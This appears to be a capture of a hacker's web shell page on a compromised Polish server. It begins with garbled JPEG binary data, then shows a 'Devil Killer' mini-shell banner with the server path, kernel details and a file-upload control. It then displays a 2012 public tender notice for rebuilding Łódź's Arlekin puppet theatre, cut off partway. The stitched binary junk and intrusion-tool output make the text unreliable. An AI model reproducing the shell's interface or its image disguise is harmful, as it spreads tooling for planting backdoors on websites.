JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121213/509908-N-2012.html

<p class="kh_header"><b>Łódź: Wykonanie robót budowlanych dla inwestycji pod nazwą:
REWITALIZACJA I MODERNIZACJA TEATRU LALEK ARLEKIN W ŁODZI</b><br>
<b>Numer ogłoszenia: 509908 - 2012; data zamieszczenia: 13.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Lalek "Arlekin" , 1 Maja 2, 90-718 Łódź, woj. łódzkie, tel. 042 6330894, faks 042 6330894.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arlekin.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Samorządu Terytorialnego - Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dla inwestycji pod nazwą:
REWITALIZACJA I MODERNIZACJA TEATRU LALEK ARLEKIN W ŁODZI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych dla inwestycji pod nazwą: REWITALIZACJI I MODERNIZACJI TEATRU LALEK ARLEKIN W ŁODZI. Projekt jest współfinansowany przez Unię Europejską z Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013, Oś priorytetowa VI. Odnowa Obszarów Miejskich - Działanie VI.1 Rewitalizacja obszarów problemowych.
2. Budynek Teatru Lalek Arlekin położony jest w centrum miasta u zbiegu ulic Wólczańskiej i 1 Maja wśród zwartej zabudowy śródmiejskiej. Teatr składa się z trzech budynków: narożnego dwukondygnacyjnego budynku głównego, częściowo podpiwniczonego, z nieużytkowym poddaszem; przyległej do niego czterokondygnacyjnej kamienicy, częściowo podpiwniczonej, z nieużytkowym poddaszem i trzykondygnacyjnej oficyny, częściowo podpiwniczonej. Wszystkie budynki położone są wokół wewnętrznego dziedzińca, do którego istnieje dojazd poprzez przejazd bramny ze zjazdu drogowego z al. 1 Maja. Na dziedzińcu zlokalizowane są stalowe schody ewakuacyjne z widowni. Na działkach sąsiednich usytuowane są budynki mieszkalne czterokondygnacyjne.
3. Charakterystyczne dane liczbowe budynku:
- powierzchnia zabudowy (istniejąca) - 954,50 m2
- powierzchnia zabudowy (po rozbudowie) - 1.056,00 m2
- powierzchnia użytkowa obiektu (po rozbudowie) - 2.933,46 m2
- kubatura (po rozbudowie) - 18.700,00 m3
- wysokość budynku w najwyższym miejscu (nad wieżą sceniczną) - 21,70 m
4. Budynek teatru powstał w roku 1903 r. jako dom redutowo-weselny wg. proj. arch. Gustawa Landau-Gutentegera. Jest to cenny i czysty stylowo obiekt secesyjny z bogatą ornamentyką kwiatową, kartuszem i wydatnym gzymsem. Po wojnie obiekt był kilkakrotnie przebudowywany. Obecnie wpisany jest do rejestru zabytków (nr rej. A-356 z 8.12.1994) co oznacza obowiązki  Wykonawcy  stosowania  odpowiednio przepisów  prawa, w tym m.in. ustawy z dnia 23 lipca 2003r o ochronie zabytków i opiece nad zabytkami, (Dz. U  z 2003r Nr 162 poz. 1568 ze zm.) oraz Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z  dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z dnia 11 sierpnia 2011 r., Nr 165, poz. 987).
5. W roku 1904 rozpoczęto dobudowę przyległej do teatru kamienicy mieszkalnej i oficyn w podwórzu. Obecnie w obu budynkach ma tu siedzibę Teatr Lalek Arlekin. 
Teatr zarządza trzema budynkami:
- budynek położony przy ul. Wólczańskiej 5; wpisany do rejestru zabytków pod NR a/356 jako jeden z najcenniejszych i najczystszych stylowo polskich zabytków w typie pierwszej secesji wiedeńskiej, w którym znajduje się część widowiskowa,
- dwoma budynkami położonymi przy Al.1 Maja 2:
czterokondygnacyjnym, w którym znajdują się biura i pracownie artystyczne
jednopiętrowym, w którym znajduje się magazyny i garaże.
6. Roboty budowlane zakładają rewitalizację zabytkowej elewacji Teatru Arlekin oraz przebudowę, nadbudowę i rozbudowę istniejącej siedziby, ze szczególnym uwzględnieniem scen widowiskowych, widowni, zaplecza edukacyjnego oraz pomieszczeń technicznych.
Roboty budowlane obejmują swym zakresem:
- zmianę lokalizacji sceny, widowni i foyer,
- zabudowę dziedzińca -stworzenie nowych pomieszczeń techniczno -magazynowych,
- budowę wieży scenicznej,	
- modernizację sceny,
- montaż windy osobowo-towarowej,
- częściowe wyburzenie ścian i stropów międzykondygnacyjnych,
- wykonanie nowych przegród pionowych i poziomych zgodnych z projektowanym układem funkcjonalno-użytkowym
- wymianę istniejącej i montaż nowej konstrukcji stalowej dachu nad widownią,
- wymianę konstrukcji drewnianej dachu nad częścią zapleczową (nad kamienica)
- wymianę pokrycia dachowego,
- wymianę istniejących instalacji oraz wprowadzenia nowych instalacji wewnętrznych,
- remont elewacji,
- dobudowę części hotelowej dla aktorów,
- dostosowanie budynku teatru do korzystania przez osoby niepełnosprawne,
- dostosowanie do obowiązujących przepisów prawa budowlanego (m.in. w zakresie bezpieczeństwa pożarowego i bhp).
W zakres robót budowlanych objętych niniejszym zamówieniem nie wchodzi dostawa i montaż wyposażenia (w tym wyposażenie systemu inspicjenta, telewizji przemysłowej, systemu elektroakustyki, oświetlenia technologicznego, aparaty oświetlenie scenicznego, urządzenia mechaniczne scen i widowni, wyposażenie technologiczne, wyświetlacze LCD - zakres tego wyposażenia opisano poglądowo w częsci 2.7 przedmiarów robót) oraz wyposażenie ruchome. Zakres dostaw technologicznych Wykonawca w zakresie systemu inspicjenta, telewizji przemysłowej, elektroakustyki, oświetlenia technologicznego i scenicznego oraz urządzeń mechanicznych scen i widowni wykona niezbędne okablowanie. W przypadku konieczności wykonania rysunków warsztatowych lub wykonawczych Wykonawca opracuje je we własnym zakresie. 
Wykonawca, przed przystąpieniem do realizacji robót konstrukcyjnych, powinien wykonać rysunki warsztatowe i wykonawcze technologii teatralnej a w szczególności elementów mechaniki teatralnej oraz elementów konstrukcji budynku w zakresie w jakim będzie to niezbędne. Rysunki te powinni wykonać projektanci posiadający odpowiednie uprawnienia i doświadczenie.  Rysunki powinny uwzględniać wytyczne konstrukcyjne wynikające z wybranych do realizacji systemów i urządzeń mechanicznych technologii teatralnej. Rysunki konstrukcyjne powinny uwzględniać wytyczne z rysunków technologii teatralnej w zakresie dotyczącym urządzeń mechanicznych sceny.Rysunki te, przed rozpoczęciem robót budowlanych powinny być uzgodnione z Zamawiającym.
Wykonawca zapewni w ramach swojego zaplecza budowy pomieszczenie do prowadzenia narad koordynacyjnych i jedno pomieszczenie dla przedstawicieli Zamawiającego i Inwestora Zastępczego.
7. Kody i nazwy ze Wspólnego Słownika Zamówień:
45000000-7 Roboty budowlane
45111000-9 Roboty rozbiórkowe
45111000-8 Roboty ziemne
45233253-7 Roboty w zakresie nawierzchni dróg dla pieszych
45262300-4 Betonowanie
45262311-4 Roboty betonowe i żelbetowe
45262300-4 Roboty zbrojarskie
45223100-7 Konstrukcje stalowe
45261100-5 Konstrukcje dachowe
45261000-4 Pokrycia dachowe i obróbki
45453000-7 Roboty remontowe i renowacyjne
45262520-2 Roboty murarskie
45320000-6 Izolacje przeciwwilgociowe
45321000-3 Izolacje termiczne
45410000-4 Roboty tynkarskie
45431200-9 Okładziny ścienne
45432210-9 Elementy z płyt gipsowo-kartonowych 
45421160-3 Ślusarka budowlana
45421000-4 Stolarka budowlana
45432100-5 Podłogi i posadzki
45442100-8 Roboty malarskie
45450000-6 Docieplenie budynku
45332000-3 Roboty instalacyjne wodne i kanalizacyjne
45332200-3 Roboty w zakresie wewnętrznych instalacji wod-kan.
45232100-3 Roboty pomocnicze w zakresie wodociągów
45231000-5 Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych
45331100-7 Instalowanie centralnego ogrzewania
45331200-8 Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych
45321000-3 Izolacja cieplna 
45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych
45331200-8 Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych
45311000-0 Roboty w zakresie okablowania oraz instalacji elektrycznych
45314000-1 Instalowanie urządzeń telekomunikacyjnych
45312100-8 Instalowanie przeciwpożarowych systemów alarmowych
45312200-9 Instalowanie przeciwwłamaniowych systemów alarmowych
8. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa stanowiąca załącznik nr 7 do niniejszej SIWZ na którą składają się w szczególności:
a) dokumentacja projektowa składająca się z projektów budowlanych i wykonawczych;
b) przedmiary robót;
c) specyfikacja techniczna wykonania i odbioru robót budowlanych w części zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót.
Roboty muszą być wykonane zgodnie z obowiązującymi przepisami, normami oraz na ustalonych niniejszą SIWZ warunkach.
9. Wykonawca zobowiązany jest zapoznać się z dokumentacją projektową i sprawdzić jej kompletność. Załączone przedmiary robót mają charakter pomocniczy. Przedmiary robót podlegają obowiązkowej weryfikacji przez Wykonawcę. W zakres zamówienia wchodzą wszystkie roboty, które należy zrealizować by przedmiot zamówienia osiągnął gotowość do eksploatacji i został wykonany należycie, zgodnie z obowiązującymi przepisami i sztuką budowlaną.  
10. Zamawiający zastrzega, iż w przypadku kolizji pomiędzy dokumentacją projektową a przedmiarem robót Zamawiającego Wykonawca nie będzie mógł odmówić wykonania robót wyszczególnionych przedmiotowo w przedmiarze w ilości wynikającej z warunków rzeczywistych mimo że nie wynikały z projektu. Wykonawca wykona także bez odrębnego wynagrodzenia roboty w zakresie nie wynikającym z przedmiaru lub projektu a niezbędnym dla prawidłowego i kompletnego wykonania przedmiotu umowy oraz uzyskania pozwolenia na użytkowanie.
11. Wynagrodzenie wykonawcy za realizację przedmiotu zamówienia będzie wynagrodzeniem ryczałtowym nie podlegającym weryfikacji, w konsekwencji czego konieczność wykonania prac, bez których przedmiot zamówienia nie mógłby być zrealizowany, a których Wykonawca wcześniej nie przewidział nie będzie miała wpływu na wysokość wynagrodzenia - nie będzie stanowiła podstaw do podwyższenia ceny określonej w ofercie.
12. Zaleca się by Wykonawca przed złożeniem oferty dokonał wizji lokalnej na terenie realizacji zamówienia.
13. W przypadkach, gdy Zamawiający opisując przedmiot zamówienia posłużył się wskazaniem konkretnego producenta, znaku towarowego, patentu Zamawiający dopuszcza składanie ofert równoważnych, czyli zastosowanie wyrobów budowlanych lub urządzeń innych aniżeli wskazane w dokumentacji pod warunkiem, że są one równoważne w stosunku do wskazanych, czyli posiadają parametry (techniczne, eksploatacyjne,  jakościowe, estetyczne) i gwarancję nie gorsze od produktów wymienionych w dokumentacji.  
14. Wykonawca zobowiązany jest zapewnić kierownictwo realizowanych robót. 
15. Wykonawca zobowiązany jest uzyskać w imieniu Zamawiającego wszelkie uzgodnienia, pozwolenia, dokonać wymaganych prawem odbiorów niezbędnych do użytkowania w tym również uzyskać pozwolenie na użytkowanie.
16. Koszty robót przygotowawczych, porządkowych, oraz wszelkie koszty prowadzenia robót i czynności limitujących odbiór końcowy, przyjęcie obiektu do użytkowania, w tym uzyskania wymaganych prawem uzgodnień i pozwoleń obciążają Wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi zostać zabezpieczona wadium w wysokości: 450.000,00 zł. (słownie: czterysta pięćdziesiąt tysięcy złotych 00/100)
2. Wadium należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w tym zakresie nie wyznacza szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do Wykonawców, którzy wykonali zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- co najmniej jedną robotę budowlaną polegającą na przebudowie, modernizacji lub budowie obiektu kubaturowego użyteczności publicznej o wartości inwestycji co najmniej 18.000.000,00 PLN netto,
- co najmniej jedną robotę budowlaną polegającą na przebudowie, modernizacji obiektu kubaturowego wpisanego do rejestru zabytków o wartości inwestycji co najmniej 8.000.000,00 PLN netto
UWAGA: W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż złoty polski, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP ogłoszony i obowiązujący w ostatnim dniu roboczym poprzedzającym dzień wszczęcia postępowania o udzielenie niniejszego zamówienia (zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w tym zakresie nie wyznacza szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w tym zakresie wymaga by Wykonawca wykazał, że podczas realizacji zamówienia będzie dysponował co najmniej:
a) Kierownik budowy posiadający łącznie:
- uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności  konstrukcyjno-budowlanej  lub równoważne, w tym wydane na podstawie wcześniejszych przepisów,
- minimum 10 letnie doświadczenie zawodowe przy pełnieniu samodzielnych funkcji technicznych w budownictwie licząc od dnia uzyskania uprawnień budowlanych,
- doświadczenie w kierowaniu lub nadzorowaniu robót na co najmniej jednym zakończonym
zadaniu polegającym na przebudowie, modernizacji obiektu kubaturowego wpisanego do rejestru zabytków o wartości robót minimum 8.000.000,00 PLN netto,
- co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych o której mowa w § 24 ust. 2 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27.07.2011 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165, poz. 987) lub zgodnie z § 31 ww. rozporządzenia uzyskał zaświadczenie o posiadaniu kwalifikacji do kierowania robotami budowlanymi przy zabytkach
nieruchomych
 b) Kierownik robót instalacyjnych w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych lub równoważne, w tym wydane na podstawie wcześniejszych przepisów,
- minimum 5 letnie doświadczenie zawodowe przy pełnieniu samodzielnych funkcji technicznych w budownictwie licząc od dnia uzyskania uprawnień budowlanych, w tym doświadczenie, jako kierownik budowy lub robót lub inspektor nadzoru dla zakończonej przebudowy, modernizacji zabytkowego obiektu kubaturowego użyteczności publicznej,
c) Kierownik robót instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważne, w tym wydane na podstawie wcześniejszych przepisów,
- minimum 5 letnie doświadczenie zawodowe przy pełnieniu samodzielnych funkcji technicznych w budownictwie licząc od dnia uzyskania uprawnień budowlanych, w tym doświadczenie, jako kierownik budowy lub robót inspektor nadzoru dla zakończonej przebudowy, modernizacji zabytkowego obiektu kubaturowego użyteczności publicznej,
d) Kierownik robót telekomunikacyjnych - uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej w zakresie telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą lub równoważne, w tym wydane na podstawie wcześniejszych przepisów,
- minimum 5 letnie doświadczenie zawodowe przy pełnieniu samodzielnych funkcji technicznych w budownictwie licząc od dnia uzyskania uprawnień budowlanych, w tym doświadczenie, jako kierownik budowy lub robót lub inspektor nadzoru dla zakończonej przebudowy, modernizacji zabytkowego obiektu kubaturowego użyteczności publicznej,
UWAGA: W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż złoty polski, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP ogłoszony i obowiązujący w ostatnim dniu roboczym poprzedzającym dzień wszczęcia postępowania o udzielenie niniejszego zamówienia (zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do wykonawców, którzy:
a) osiągnęli w każdym z ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przychody ze sprzedaży, w kwocie co najmniej 18.000.000,00 PLN,
b) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 5.000.000,00 PLN, 
c) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 10.000.000,00 PLN,
UWAGA: W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż złoty polski, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP ogłoszony i obowiązujący w ostatnim dniu roboczym poprzedzającym dzień wszczęcia postępowania o udzielenie niniejszego zamówienia (zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

